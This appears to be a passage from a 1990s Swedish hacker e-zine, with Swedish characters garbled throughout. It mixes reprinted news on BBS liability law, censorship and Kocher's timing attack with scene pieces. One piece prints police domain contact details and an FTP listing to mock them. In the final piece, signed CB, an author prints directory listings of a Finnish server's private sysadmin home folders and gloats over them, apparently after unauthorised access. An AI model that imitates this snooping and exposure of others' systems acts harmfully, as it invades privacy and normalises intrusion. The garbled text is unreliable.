50 000 mnniskor Internet i Kina. Fr vetenskapsmn r ntet en
guldgruva eftersom informationen r gratis.
Explosiv brygd
Den kinesiska regeringen fruktar frmst politisk opposition och
pornografi. Dissidenter som skickar information via ntet till
sympatisrer i Kina rinte populra.
Regeringens "Internet Light" innebr att de kinesiska anvndarna
kan skapaegna hemsidor, byta information med varandra, anvnda
databaser och beskade hemsidor som accepteras av regimen. ÷vriga
delar av Internet grs otillgngliga med hjlp av ett mjukvaru-
program frÂn det amerikanska fretaget Sun Microsystems.
Kineserna erknner att en hacker kan ta sig igenom. Men det r
bÂde svÂrt och riskfyllt att bryta mot reglerna.
Sex och politik r tydligen en explosiv brygd i Kina.
---------------------------------------------------------------------------
6.5 Datateknik, 960215 Slutet fr de elektroniska klotterplanken
---------------------------------------------------------------------------
Den 30 augusti 1995 hlls i Rosenbad en hearing kring ett
lagutkast om BBSer (Bulletin Board Systems). Eller elektroniska
anslagstavlor som de kallas p svenska.
Bland de fyrtiotal inviterade fanns folk frÂn myndigheter,
organisationer, universitet och nringsliv, med stark kantring
Ât jurister. Ocks Telia, Postnet, Sunet, TT och olika regionala
ntverkssatningar var p plats. Samt en liten grupp nrmast
srjande. BBSare frÂn det vrldsomspnnande BBS-ntet Fidonet,
men ocks frÂn de partipolitiska anslagstavlorna fr (s) och (m),
plus nÂgra till.
Vrd var enmansutredaren i IT-utredningen, Hans Jacobsson, till
vardags chef fr bankstdsnmnden.
Vad var det d som Jacobsson satte i hnderna p gsterna? Jo,
ett lagfrslag som var rena ddsstten fr allt vad BBSer heter.
Enligt frslaget ska systemgaren, eller en av honom utsedd
systemoperatr, ha ansvaret fr att BBSen inte innehÂller nÂgot
brottsligt. Anvndare mÂste loggas och registreras fr att vid
behov kunna spÂras av polisen. Uppgifterna ska tillsammans med
det vederbrande lagt in i basen sparas under ett Ârs tid.
Datainspektionen ska ha full frihet att nr som helst
kontrollera databasen och efter eget gottfinnande stnga den.
gare och systemoperatr mÂste ha uppnÂtt myndig Âlder! Klart
att det blev protester.
De lagkloka upprrdes lika mycket som ntadministratrer och
databasproducenter. Men i synnerhet frstÂs BBSarna sjlva.
-Det r helt ohÂllbart att lgga ansvaret p systemoperatren,
menar BBSaren Jonny Bergdahl som var med p hearingen fr ett
halvÂr sedan.
-Ingen kommer att vÂga ha det jobbet. Bara genom min dator
passerar 1500 inlgg var dag. Man kan inte lsa allt!
-Och Datainspektionen fÂr i frslaget strre makt n polisen som
ju inte kan gra husrannsakan utan att ha allvarliga misstankar
om brott!
Men alldeles uselt var nog inte frslaget, frsvarar sig IT-
utredningens sekreterare Per Furberg.
-Flera kom fram efterÂt och tyckte det var bra. Varken Furberg
eller Jacobsson gr dock nÂgon hemlighet av att majoriteten var
starkt negativ.
NÂgra exempel: Omjligt att spara allt ett helt Âr; omjligt att
registrera och kolla upp alla som ringer in till databasen;
orimligt att lgga svÂra straffrttsliga bedmningar pÂ
systemoperatrerna.
Kanske, menar utredarna idag, var kritiken till stor del
sjlvfrvÂllad.
-Vi ville ha reaktioner s vi tog i ordentligt. Det var ett
provskott!
Leverans enligt order
Men med fyra timmars bandad kritik i bagaget var det bara fr
utredarna att efter hearingen vnda hem till lagskrivarverkstan
med svansen mellan benen.
Men ndÂ. Lydde inte utredarna bara order och effektuerade den
bestllning de fÂtt? Nr Bildtregeringen tillsatte IT-
utredningen sommaren 94 var det fr att ta udden ur de
kriminella anslagstavlorna. De som gjort sig bemrkta som forum
fr allehanda brottslig verksamhet; piratkopiering, frmlings-
fientlig propaganda, eller som informationsklla fr
narkotikatillverkning, virussspridning med mera.
Att BBSer ocks kan vara kanaler fr Âsiktsutbyte omnmndes
frvisso i utredningsdirektiven, men bara som en kollisionsrisk
mellan datalagens personregister och censurfrbudet i etablerade
massmedier.
Det var tydligt att regeringen frmst var ute efter en snabbt
hopkommen strafflag som kunde f slut p avarterna bland BBSerna.
Ett synstt den delar med mÂnga regeringar dessa dagar. Senast
dokumenterat i en EuroparÂdsrekommendation frÂn september 95,
dr medlemslnderna uppmanas utfrda lagar som lgger ansvaret
p systemoperatrerna. Och den svenske delegaten i arbetsgruppen
bakom rekommendationen hette frstÂs: Per Furberg! BBS-
kriminalitetens verkliga omfattning r det ingen som knner.
Enligt RPS sysslar minst 1000 av de 4000-6000 BBSerna i landet
regelmssigt med brott.
Men r de verkligen s oÂtkomliga med gllande lagar? BÂde ja
och nej.
En vrmlndsk BBS-gare i Karlstad blev fr en tid sedan
btflld fr att han tillÂtit barnpornografiska bilder i sin
databas. Han hade inte sjlv gjort nÂgot fr att underltta
trafiken, men han knde till den. Domen verklagades men togs
aldrig upp av hovrtten.
Ett annat omdebatterat fall r helsingborgaren som Âtalats fr
att ha upplÂtit sin BBS fr spridning av piratkopior. MÂlet
avgrs i dagarna av Hgsta Domstolen, men tills dess gller den
friande domen frÂn hovrtten.
Denna oskerhet om lagstiftningens rckvidd r motivet till en
srskild BBS-lag. I det preliminra frslaget passar utredarna
ocks p att gra bland annat barnpornografi och rasistiska
uttalanden Âtalbara redan nr de nÂr fram till en BBS, vilket de
inte r idag.
Frslaget har blivit en blandning av den tryckfrihetsrttsliga
modellen och vanlig strafflag. Enligt TF svarar en ansvarig
utgivare ensam fr brott som begÂs genom tryckt skrift. Enligt
BBS-lagen ansvarar alla! Inte bara systemoperatren fÂr ta
smllen, utan ven frfattare och andra bidragsgivare, fr
krnkande uttalanden, rasism, olagliga bilder och piratkopior.
Fastn uppenbarligen inspirerad av ansvarssystemet i TF och
Yttrandefrihetslagen (YGL) drmmer IT-utredningen till med
dubbelt straffansvar. Ja, mÂngdubbelt om man betnker att i nt
som Fidonet samma information studsar Âtskilliga gÂnger mellan
ett stort antal BBSer.
Alternativ finns
ven diskussionsgrupper (newsgroups), och chats p Internet
trffas av bannbullan. Tusentals sÂdana mten mellanlandar
dagligen p svenska universitets- och fretagsdatorer. Blir BBS-
frslaget lag kommer Sveriges systemoperatrer aldrig mer att
vÂga g och lgga sig om ntterna. De mÂste hela tiden kila upp
och kolla hÂrddisken! I Australien har man skissat en modell med
stegvis upptrappade sanktioner fr dem som sprider sex och vÂld
p ntet. Men tills vidare har man stannat fr den lgsta
ingreppsnivÂn, sjlvsanering bland ntadministratrerna. Under
tiden ska det faktiska behovet av en lagrevision kartlggas
ordentligt. I USA laborerar domstolarna redan med utgivaransvar
i vissa situationer. Databasgare som bara upplÂter plats pÂ
skivminnen eller skickar materialet vidare obearbetat
(distributors) slipper ansvar. De som frsker stda och hÂlla
rent riskerar dremot att Âka dit (publisher), vilket den
vlknda jtte-BBSen Prodigy fick erfara nr den dmdes som
ansvarig publisher fr rekrnkande inlgg frÂn en deltagare i
den ppna, mycket populra, diskussionsgruppen Money Talks.
Det senaste i USA r den nyligen antagna, Decency Act som r en
del i den federala telelagen. Dr bannlyses alla slags obsceniteter
i ord och bild p ntet. Framfrallt det som riktar sig mot
ungdomar under 18 Âr. Databasgare som medvetet tillÂter sÂdan
trafik straffas med dryga bter eller upp till 2 Ârs fngelse.
De kan slippa ansvar om de p godtagbart stt frskt
hindra Âtkomst fr ungdomar.
Ett alternativ som IT-utredningen fÂtt att fundera ver kommer
frÂn juristen vid Stockholms universitet Martin Brinnen. Han
skriver en doktorsavhandling om telemedier och menar att
utredningens frslag r ondigt detaljerat.
Brinnen anser att man kan lgga ett generellt ansvar p alla
tele-och ntoperatrer fr det som gÂr genom deras nt. Den som
vill kan glida ur snaran genom att ha ett loggningssystem som
avsljar avsndarna.
Enligt Brinnen skulle det rcka med ett litet ingrepp i
telelagen, och man skulle slippa irriterande regler om censur,
arkivering och tillsyn.
Senast den 31 mars i Âr ska IT-utredningens slutfrslag ligga
hos regeringen. FrÂn brjan gllde 1 november-95 som deadline,
men efter debaclet vid hearingen begrde man extra tid.
Utredningen har ocks ett uppdrag om elektroniska dokument sÂ
BBS-frslaget har legat i trda sedan augusti.
-Men nu ska vi ta itu med den, sger Hans Jacobsson.
Tnkte fr smÂtt
FrÂgan r vilken roll kritiken fÂr spela?
-Jag vet inte. Men det r klart, nr vi skissade vÂrt frslag
hade jag en liten smÂskalig BBS i Nykpingstrakten i tankarna.
Nu har jag frstÂtt att lagen drabbar mÂnga fler.
-Som nÂgon sa: rtt vad det r dimper det ned 40 Megabyte news
frÂn USA.
-Arkivering i ett Âr under sÂdana omstndigheter r att begra
fr mycket.
ven annat mÂste nog omprvas menar Jacobsson. SÂdant som
mjligheterna att kontrollera innehÂllet och Datainspektionens
roll.
-Men den som vet vad han har i databasen br kunna ta ett ansvar.
BBS-lagen skulle ha trtt i kraft till sommaren om det
ursprungliga schemat fljts. Nu blir det tidigast till Ârskiftet.
Nu stÂr Âtminstone tre olika kockar och rr i BBS-soppan.
Frutom Jacobssons utredning, r det utredningen om Nya Medier
och en nytillsatt Datalagsutredning. Men alla r i otakt och har
inte kunnat prata ihop sig.
Ett tnkbart scenario r att det kollektiva ansvar som IT-
utredningen arbetar med kolliderar med ett enmansansvar av TFs
modell, vilket utredningen om Nya medier kan tnkas freslÂ. Och
Datalagsutredningen kan snubbla p EUs persondatadirektiv vars
normer fr skydd av personuppgifter BBSer knappast lever upp
till.
Det kan bli en svÂr huvudvrk fr regeringen. En ny lag fÂr
kanske snabbt bukt med problemen, men lper  andra sidan risk
att behva ndras radikalt redan efter nÂgot Âr.
---------------------------------------------------------------------------
6.6 Datateknik, 960215 Netscapes kryptering bruten p nytt-med gammal metod
---------------------------------------------------------------------------
Dagens krypteringsalgoritmer r inte s skra som experterna
vill lÂta gra gllande. De kan inte knckas med matematiska
eller kryptotekniska tillvgagÂngsstt. Dremot kan de vara
mycket sÂrbara mot okonventionella metoder.
Paul Kocher, biologistuderande och inte alls nÂgon
skerhetseller kryptoexpert, lyckades hitta en allvarlig svaghet
i dagens krypteringssystem med ppna nycklar. Han visade att
tiden det tar fr att koda och avkoda meddelanden kan avslja
information om viktiga delar i krypteringsalgoritmerna.
MÂnga krypteringsprogram arbetar med ppna nycklar. Den ppna
nyckeln r knd, medan varje anvndare har en egen privat.
Nycklarna r vanligen mycket stora primtal. Vissa
krypteringsprogram, som det i Netscape, anvnder den privata
nyckeln som en exponent. Det hjer den privata nyckeln och ett
annat primtal till potensen av den privata nyckeln, alltsÂ
nyckeln upphjt till sig sjlvt.
Paul Kocher upptckte att han fick ledtrÂdar till utformningen
av den privata nyckeln efter hur lÂng tid meddelanden av olika
lngd tar att koda och avkoda. En miljard kombinationer kan vara
omjligt fr en hacker att forcera, men om man genom Kochers
teknik kan minska antalet mjliga fall till en miljon r
krypteringen inte lngre sker. Problemet med de olika
berkningstiderna har lnge varit knt inom forskningen pÂ
kryptering, men kryptoexperter r matematiker och inga
skerhetsexperter, och kunskapen har inte trngt ut.
---------------------------------------------------------------------------
6.7 Datateknik, 960215 Storebror fumlar med lagbckerna
---------------------------------------------------------------------------
En statlig utredning freslÂr att den som driver en BBS mÂste
vara minst 18 Âr och att han ska vara ansvarig fr att basen
inte innehÂller nÂgot brottsligt. Han ska logga anvndarna sÂ
att de kan spÂras av polisen och han ska spara allt som skickas
in under ett Âr. Det r frstÂs ett orimligt frslag som, om det
genomfrs, raderar ut hela BBS-kulturen. Och drmed en hobby som
sannolikt lockat mÂnga ungdomar att bli datatekniker. Hr mÂste
lagstiftarna hitta bttre lsningar.
Christer kerman visar p sidorna 22-25 i detta nummer av
Datateknik p de problem som uppsÂtr om lagen antas. I USA har
presidenten just skrivit p en ny telekommunikationslag. I lagen
ingÂr en del som kallas Decency Act och som innebr att
obsceniteter i ord och bild bannlyses p ntet. Framfrallt vill
man stoppa det som riktar sig till ungdomar under 18 Âr. Porr
fÂr endast spridas om man frskrat sig om att mottagaren r
vuxen och att denne verkligen vill se materialet.
Frslaget har fÂtt mÂnga WWW-publicister att protestera genom
att lgga en sorgsvart bakgrund p sina sidor. Denna amerikanska
strid stÂr, frenklat, mellan en tryckfrihetsfundamentalistisk
falang och den inflytelserika kristna hgern. Mer om detta pÂ
vÂra nyhetssidor.
Lgg s till dessa bÂda aktuella hndelser debatten kring
krypteringen. tskilliga av vrldens stater vill frhindra allt
fr kraftfull kryptering. Vrldens storebrder vill istllet att
vi ska anvnda kryptering med inbyggda lnndrrar fr polisen.
USA har frbjudit export av krypton med alltfr lÂnga nycklar.
Vad vi ser r en match mellan tekniken (och individuella
tekniker) och staterna. Det r svÂrt att tro att inte staterna
till slut tar hem spelet. Men det r ocks svÂrt att se hur de
ska lyckas med det nr teknikerna tagit fram en sÂ
decentraliserade ntlsning som Internet.
---------------------------------------------------------------------------
6.8 TT, 960222 HD lt datakopierare behÂlla utrustning
---------------------------------------------------------------------------
Hgsta domstolen mildrade hovrttens dom och lÂter en 22-Ârig
Stockholmare behÂlla merparten av sin datorutrustning. I
hovrtten dmdes mannen fr upphovsrttsintrÂng. Tv datorer och
sex hÂrddiskar ansÂgs vara frverkade.
HD lÂter 22-Âringen behÂlla allt utom en hÂrddisk som rtten
anser innehÂlla upphovsrttsligt skyddat material som spritts
via en elektronisk brevlÂda, Bulletin Board System (BBS). 22-
Âringen har i sitt hem haft en databas med mycket stor
kapacitet. I databasen har han haft minst 1 000 program som
varit upphovsrttsligt skyddade.
Under 1992 och 1993 gjorde mannen programmen tillgngliga fr
omkring 300 anvndare genom sin BBS. I databasen frekom ocksÂ
byten och kopieringar av olika program mellan anvndarna. I HD:s
dom pÂpekar man att frverkande enligt upphovsrttslagen endast
kan bli aktuell om man tror att material ska anvndas fr
brottslig verksamhet.
HD anser att det bara r en av hÂrddiskarna som innehÂller det
upphovsrttsskyddade material som 22-Âringen spritt i sin BBS.
Drfr fÂr han nu tillbaka det andra materialet.
---------------------------------------------------------------------------
6.9 Computer Sweden, 960227 Lucka i lagen skyddar piratkopior
---------------------------------------------------------------------------
Det r inte olagligt att ha en BBS dr vem som helst kan hmta
hem piratkopierade program.
Hgsta domstolen friade i torsdags en man som drev en sÂdan BBS,
eftersom han inte sjlv aktivt medverkat till spridningen.
Medverkandeansvaret togs aldrig upp nr en man frÂn Helsingborg
stod Âtalad i hgsta domstolen fr brott mot upphovsrttslagen.
Mannen drev i brjan av 90-talet en BBS, en elektronisk
anslagstavla, dr piratkopierade program fanns tillgngliga fr
vem som helst att hmta.
-Domen r bekymrande fr mjukvaruindustrin. Som domen r
formulerad sger den att man i princip aldrig kan utkrva ansvar
av en systemoperatr, sger advokat Agne Lindberg som r
juridiskt ombud fr leverantrsorganisationen Business Software
Alliance.
-BSA kommer att verka fr en lagfrndring. Det borde g att
krva ansvar av den som kper modem och lgger upp en databas.
HD konstaterar i sin dom att det finns en pÂtaglig lucka i det
upphovsrttsliga skyddet fr program, men domstolen ansÂg att
man mÂste dma enligt lagens bokstav, och d ska mannen frias.
-Hovrtten kunde inte bevisa att programmen faktiskt hade
kopierats. Dessutom krvs bevis fr att mannen var medveten om
kopieringen. Drfr kunde HD inte ta upp frÂgan, sger Nils
Rekke, byrÂchef hos RiksÂklagaren.
Mannen flldes i tingsrtten men friades i hovrtten. Nu har han
allts friats ven av hgsta domstolen.
[ Se http://www.dsv.su.se/~jpalme/BBS-domen-HD-96-02-22.html fr
det fullstndiga domslutet ]
__ _ _ ___ ___
___ ( _| U | ) = __________________________________________________________
7.0 ___)___)_)_\_| av htXs
Den hetaste URL:en just nu mÂste vara www.takedown.com, i alla fall om man
fÂr rkna imponansvrdet i "Kevin-on-Demand". Vi rekommenderar ett omedelbart
besk.
Om du inte skulle ha tillgÂng till en grafisk browser, g rakt p hjdpunkten
och telnet:a till kevin-on-demand.takedown.com p nÂgon port mellan 4001 och
4028. Den vedertagna uppfattningen r nog att 4010 r absolut bst.
Du behver inte gra nÂgot aktivt fr att njuta av frestllningen, men du kan
anvnda fljande knappar fr att styra hastigheten:
0-9 Move at a rate of 0-9. (0 is stopped.)
> Move forward.
If already moving forward, increase speed.
< Move in reverse.
If already in reverse, increase speed.
} Single-step forward.
{ Single-step backward.
+ Increase speed by 0.5.
- Decrease speed by 0.5.
f,p Move forward. Reset speed to 1.
F,P Move forward. Reset speed to 10.
r Move in reverse. Reset speed to 1.
R Move in reverse. Reset speed to 10.
s Slow, then slower.
/ Skip.
<space> Pause.
q Exit.
__ __ __ ___ ___
___ | V | ( _| __) _______________________________________________________
8.0 |__v__|__|___)___)
Rikspolisstyrelsen p Internet
av
Broken Pipe
[NWS - Niggaz With Sniffers]
Det verkar inte smre n att snuten mnar gra sin nrvaro p Internet knd
genom att fortstta sitt arbete med att sprida harmoni, gldje och mnnisko-
krlek ven i digital form.
domain: police.se
org: Rikspolisstyrelsen
admin-c: Patric Ostman
address: Box 12256, S-102 26 Stockholm
phone: +46 8-4019540
fax-no: +46 8-6507787
Domnen bestÂr av ett litet nt med ett par PCs och i alla fall en HP-box.
Vad RPS internetssatsning kommer att innebra, och hur lÂngt de kommit r
svÂrt att sga. De har en www-sida som bestÂr av meddelandet "under
uppbyggnad", och deras mail-server har fljande att sga om livet:
220 mail.police.se ESMTP server (post.office v1.9.1 **** trial license expired ****) ready
Dock verkar den fortfarande vara funktionsduligt. Vi fÂr verkligen hoppas att
inte RPS *olagligt* nyttjar en licens som gÂtt ut!
Det enda som man kan vara helt sker p r att den anonyma ftp-servern pÂ
ftp.police.se inte r subventionerad av ledningen inom Rikspolisstyrelsen.
Eller r detta ett helt nytt grepp fr att ka polisens populritet?
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
total 13232
drwxr-xr-x 3 root root 3072 Jul 31 1995 .
drwxrwxr-x 3 root wheel 1024 Jul 31 1995 ..
-rw-r--r-- 1 root root 15395 Jul 31 1995 00INDEX
-rw-r--r-- 1 root root 126176 Jul 31 1995 GiaGary.gif
-rw-r--r-- 1 root root 56419 Jul 31 1995 LiLi.jpg
-rw-r--r-- 1 root root 25857 Jul 31 1995 NEWinona17.jpg
-rw-r--r-- 1 root root 1840 Jul 31 1995 README.uploads
-rw-r--r-- 1 root root 37391 Jul 31 1995 W_Ryder.jpg
-rw-r--r-- 1 root root 104200 Jul 31 1995 WinRyder08.jpg
-rw-r--r-- 1 root root 120206 Jul 31 1995 WinRyder09.jpg
-rw-r--r-- 1 root root 8846 Jul 31 1995 WinonaAgeInn1.jpg
-rw-r--r-- 1 root root 13716 Jul 31 1995 WinonaAgeInn2.jpg
-rw-r--r-- 1 root root 27053 Jul 31 1995 WinonaAgeInn3.jpg
-rw-r--r-- 1 root root 36359 Jul 31 1995 WinonaAndJohnny.jpg
-rw-r--r-- 1 root root 39715 Jul 31 1995 WinonaBeach.jpg
-rw-r--r-- 1 root root 141603 Jul 31 1995 WinonaBed.jpg
-rw-r--r-- 1 root root 11776 Jul 31 1995 WinonaBigHair.jpg
-rw-r--r-- 1 root root 55552 Jul 31 1995 brooke.gif
-rw-r--r-- 1 root root 34144 Jul 31 1995 chlock.gif
-rw-r--r-- 1 root root 490090 Jul 31 1995 death_drop.gif
-rw-r--r-- 1 root root 178693 Jul 31 1995 dick_button1.gif
-rw-r--r-- 1 root root 492033 Jul 31 1995 doubleAxel2.gif
-rw-r--r-- 1 root root 101999 Jul 31 1995 elaine_zayak1.gif
-rw-r--r-- 1 root root 76037 Jul 31 1995 elana1.jpg
-rw-r--r-- 1 root root 413766 Jul 31 1995 flip.gif
-rw-r--r-- 1 root root 26064 Jul 31 1995 impressionist.gif
-rw-r--r-- 1 root root 61489 Jul 31 1995 janet.jpg
-rw-r--r-- 1 root root 245397 Jul 31 1995 karen_bryden.jpg
-rw-r--r-- 1 root root 29130 Jul 31 1995 katerina_witt1.jpg
-rw-r--r-- 1 root root 81503 Jul 31 1995 katerina_witt2.gif
-rw-r--r-- 1 root root 129860 Jul 31 1995 katerina_witt3.jpg
-rw-r--r-- 1 root root 184112 Jul 31 1995 katerina_witt4.gif
-rw-r--r-- 1 root root 90131 Jul 31 1995 katerina_witt5.gif
-rw-r--r-- 1 root root 74982 Jul 31 1995 katerina_witt6.gif
-rw-r--r-- 1 root root 307617 Jul 31 1995 kerrig2a.gif
-rw-r--r-- 1 root root 276742 Jul 31 1995 kerrig3a.gif
-rw-r--r-- 1 root root 204805 Jul 31 1995 kerrig4a.gif
-rw-r--r-- 1 root root 341938 Jul 31 1995 kerrig5a.gif
-rw-r--r-- 1 root root 335129 Jul 31 1995 kerrig6a.gif
-rw-r--r-- 1 root root 127534 Jul 31 1995 kimbass2.gif
-rw-r--r-- 1 root root 43747 Jul 31 1995 kimbass5.jpg
-rw-r--r-- 1 root root 45025 Jul 31 1995 kristi_yamaguchi1.gif
-rw-r--r-- 1 root root 95620 Jul 31 1995 kristi_yamaguchi2.jpg
-rw-r--r-- 1 root root 18101 Jul 31 1995 kristi_yamaguchi3.jpg
-rw-r--r-- 1 root root 21514 Jul 31 1995 kristi_yamaguchi4.jpg
-rw-r--r-- 1 root root 185324 Jul 31 1995 lisa_ervin1.gif
-rw-r--r-- 1 root root 392736 Jul 31 1995 loop.gif
-rw-r--r-- 1 root root 47811 Jul 31 1995 lu_chen1.jpg
-rw-r--r-- 1 root root 385173 Jul 31 1995 lutz.gif
-rw-r--r-- 1 root root 70669 Jul 31 1995 mariah1.jpg
-rw-r--r-- 1 root root 185063 Jul 31 1995 michelle_kwan1.gif
-rw-r--r-- 1 root root 181683 Jul 31 1995 michelle_kwan2.gif
-rw-r--r-- 1 root root 56616 Jul 31 1995 midori_ito1.gif
-rw-r--r-- 1 root root 36392 Jul 31 1995 midori_ito2.jpg
-rw-r--r-- 1 root root 68899 Jul 31 1995 nancy_kerrigan1.gif
-rw-r--r-- 1 root root 100710 Jul 31 1995 nancy_kerrigan2.gif
-rw-r--r-- 1 root root 29968 Jul 31 1995 nancy_kerrigan3.jpg
-rw-r--r-- 1 root root 30609 Jul 31 1995 nb_camp1.gif
-rw-r--r-- 1 root root 164823 Jul 31 1995 nicole_bobek1.gif
-rw-r--r-- 1 root root 39173 Jul 31 1995 nk_camp1.gif
-rw-r--r-- 1 root root 69377 Jul 31 1995 ob_camp1.gif
-rw-r--r-- 1 root root 48874 Jul 31 1995 ob_camp2.gif
-rw-r--r-- 1 root root 62745 Jul 31 1995 ob_camp3.gif
-rw-r--r-- 1 root root 64580 Jul 31 1995 ob_camp4.gif
-rw-r--r-- 1 root root 50959 Jul 31 1995 ob_camp5.gif
-rw-r--r-- 1 root root 59502 Jul 31 1995 ob_camp6.gif
-rw-r--r-- 1 root root 39870 Jul 31 1995 ob_camp7.gif
-rw-r--r-- 1 root root 38377 Jul 31 1995 ob_camp8.gif
-rw-r--r-- 1 root root 228147 Jul 31 1995 oksana_bayul1.gif
-rw-r--r-- 1 root root 169752 Jul 31 1995 oksana_bayul2.gif
-rw-r--r-- 1 root root 123132 Jul 31 1995 oksna-17.jpg
-rw-r--r-- 1 root root 112161 Jul 31 1995 oksna-au.gif
-rw-r--r-- 1 root root 161280 Jul 31 1995 oksna-lm.jpg
-rw-r--r-- 1 root root 76255 Jul 31 1995 oksna-oi.jpg
-rw-r--r-- 1 root root 62121 Jul 31 1995 oksna-st.jpg
-rw-r--r-- 1 root root 81408 Jul 31 1995 pa-hwf1.jpg
-rw-r--r-- 1 root root 58387 Jul 31 1995 pa-mar92.jpg
-rw-r--r-- 1 root root 64982 Jul 31 1995 pa-nov93.jpg
-rw-r--r-- 1 root root 102037 Jul 31 1995 pa-pca1.jpg
-rw-r--r-- 1 root root 84502 Jul 31 1995 pa-pca2.jpg
-rw-r--r-- 1 root root 71168 Jul 31 1995 pa-port1.jpg
-rw-r--r-- 1 root root 87936 Jul 31 1995 pa-soaks.jpg
-rw-r--r-- 1 root root 68096 Jul 31 1995 pa-suita.jpg
-rw-r--r-- 1 root root 677512 Jul 31 1995 pamelada.gif
-rw-r--r-- 1 root root 18154 Jul 31 1995 pamiller.jpg
-rw-r--r-- 1 root root 160431 Jul 31 1995 pfeifer1.jpg
-rw-r--r-- 1 root root 54526 Jul 31 1995 pfeiffe3.jpg
drwxr-xr-x 2 root root 1024 Jul 31 1995 playmate
-rw-r--r-- 1 root root 248807 Jul 31 1995 poster.gif
-rw-r--r-- 1 root root 128122 Jul 31 1995 pvkergn3.gif
-rw-r--r-- 1 root root 88333 Jul 31 1995 pvkergn5.gif
-rw-r--r-- 1 root root 252220 Jul 31 1995 pvoksna1.gif
-rw-r--r-- 1 root root 299976 Jul 31 1995 pvsktmdl.gif
-rw-r--r-- 1 root root 1840 Jul 31 1995 readme.upl
-rw-r--r-- 1 root root 48329 Jul 31 1995 sandra.gif
-rw-r--r-- 1 root root 98223 Jul 31 1995 sandra_b.jpg
-rw-r--r-- 1 root root 533573 Jul 31 1995 sit.gif
-rw-r--r-- 1 root root 771 Jul 31 1995 skate_cat.gif
-rw-r--r-- 1 root root 9110 Jul 31 1995 spiral1.gif
-rw-r--r-- 1 root
root 94769 Jul 31 1995 surya_bonaly1.gif
-rw-r--r-- 1 root root 26064 Jul 31 1995 surya_bonaly2.gif
-rw-r--r-- 1 root root 258337 Jul 31 1995 tanja_szewczenko.gif
-rw-r--r-- 1 root root 180200 Jul 31 1995 tanja_szewczenko2.gif
-rw-r--r-- 1 root root 101327 Jul 31 1995 tanja_szewczenko3.gif
-rw-r--r-- 1 root root 384265 Jul 31 1995 tloop.gif
-rw-r--r-- 1 root root 146359 Jul 31 1995 tonya_harding1.gif
-rw-r--r-- 1 root root 17428 Jul 31 1995 topthree.jpg
-rw-r--r-- 1 root root 221906 Jul 31 1995 zam.jpg
226 Transfer complete.
7618 bytes received in 1.3 seconds (5.6 Kbytes/s)
ftp> cd playmate
250 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
total 332
drwxr-xr-x 2 root root 1024 Jul 31 1995 .
drwxr-xr-x 3 root root 3072 Jul 31 1995 ..
-rw-r--r-- 1 root root 64712 Jul 31 1995 playmate-apr95.jpg
-rw-r--r-- 1 root root 18204 Jul 31 1995 playmate-aug95-b.jpeg
-rw-r--r-- 1 root root 27497 Jul 31 1995 playmate-dec94.jpg
-rw-r--r-- 1 root root 48368 Jul 31 1995 playmate-feb95.jpg
-rw-r--r-- 1 root root 26496 Jul 31 1995 playmate-jan95.jpg
-rw-r--r-- 1 root root 63759 Jul 31 1995 playmate-jun95-b.jpg
-rw-r--r-- 1 root root 23042 Jul 31 1995 playmate-mar95.jpg
-rw-r--r-- 1 root root 51941 Jul 31 1995 playmate-may95.jpg
226 Transfer complete.
733 bytes received in 0.097 seconds (7.4 Kbytes/s)
ftp>
_______________________________________________________________________________
8.2
En sysadmins samvete
av CB
[ Fljande artikel fick vi via mail frÂn ett konto som bergis inte
tillhr avsndaren. Texten var signerad CB, s det r namnet som vi
stter ut som artikelfrfattare. Tyvrr knde vi att det vore alltfr
grymt att hnga ut vissa personer som omnmndes, drfr r delar av
texten raderad, och vissa namn och adresser r borttagna. Vi har
givetvis inte haft mjlighet att kontrollera nÂgon av uppgifterna. ]
Tur ar val att det finns sys admins. Hur skulle det annars se ut? Med en
massa users som hackar, tradar w4r3z, och beter sig allmant illa at..
Tja, det kan vara ngt att tanka pa.. Men forst sa kan ni kolla pa hur
olika sysadmin's bar sig at.. Hehe..
Till exempel pa -----.---.fi.. Kanske mera kant som ------- --------- --
----------.
Ett utdrag ur en ls -laR / ..
total 312
drwxr-xr-x 20 root root 1024 Jan 10 11:37 .
drwxr-xr-x 20 root root 1024 Jan 10 11:37 ..
drwxr-xr-x 10 webadmin webadmin 1024 Jan 11 17:25 WWW
drwxr-xr-x 2 root bin 2048 Jan 10 10:25 bin
drwxr-xr-x 2 root root 1024 Aug 28 00:36 boot
drwxr-xr-x 2 root root 4096 Jan 10 10:28 dev
drwxr-xr-x 9 root root 3072 Jan 12 13:09 etc
drwxrwxr-x 72 root root 2048 Jan 11 17:27 home
drwxr-xr-x 3 root root 1024 Aug 17 00:09 lib
drwxr-sr-x 6 list list 1024 Oct 26 23:19 list
drwxr-xr-x 2 root root 12288 Jul 10 1995 lost+found
drwxr-xr-x 2 root root 1024 Mar 16 1994 mnt
drwxrwxr-x 4 root root 1024 Nov 26 20:27 private
drwxrwxr-x 13 root TheDudez 1024 Jan 12 12:56 private2
^^^^^^^^
Hmm, bara att det finns en group som heter TheDudez tyder ju pa att
sysadm verkar vara lite "oserios"..
dr-xr-xr-x 7 root root 0 Jan 10 12:28 proc
drwx------ 14 root root 2048 Jan 12 11:14 root
drwxr-xr-x 2 root bin 2048 Aug 28 01:06 sbin
drwxrwxrwt 5 root root 5120 Jan 12 19:00 tmp
drwxr-xr-x 20 root root 1024 Aug 22 16:55 usr
drwxr-xr-x 18 root root 1024 Jul 28 14:02 var
-r-------- 1 root root 273412 Sep 14 10:46 vmlinuz
Tja, ska vi borja med att kolla vad som finns i /private da..
/private:
total 6
drwxr-xr-x 4 root root 1024 Nov 26 20:27 .
drwxr-xr-x 20 root root 1024 Jan 10 11:37 ..
drwxr-xr-x 24 candyman nighteam 2048 Jan 12 15:36 candyman
drwxr-xr-x 24 pone nighteam 2048 Jan 12 08:45 pone
Tva stycken, enligt vad jag kan forsta sysadmins.. Eftersom de har egna
group's och ligger i /private som ar agd av root.. For att inte namna att
filer i deras hem-dir ar root-agda da.. Ska bli kul att se vad de har for
roligt..
/private/candyman:
total 711
drwxr-xr-x 24 candyman nighteam 2048 Jan 12 15:36 .
drwxrwxr-x 4 root root 1024 Nov 26 20:27 ..
-rw-r--r-- 1 candyman nighteam 0 Jul 11 1995 .addressbook
-rw-r--r-- 1 candyman nighteam 1257 Jul 11 1995 .addressbook.lu
-rw-r--r-- 1 candyman nighteam 451 Jan 12 13:19 .cshrc
-rw-r--r-- 1 candyman nighteam 481 Jan 10 12:35 .cshrc~
-rw-r--r-- 1 candyman nighteam 122 Jan 10 12:41 .emacs
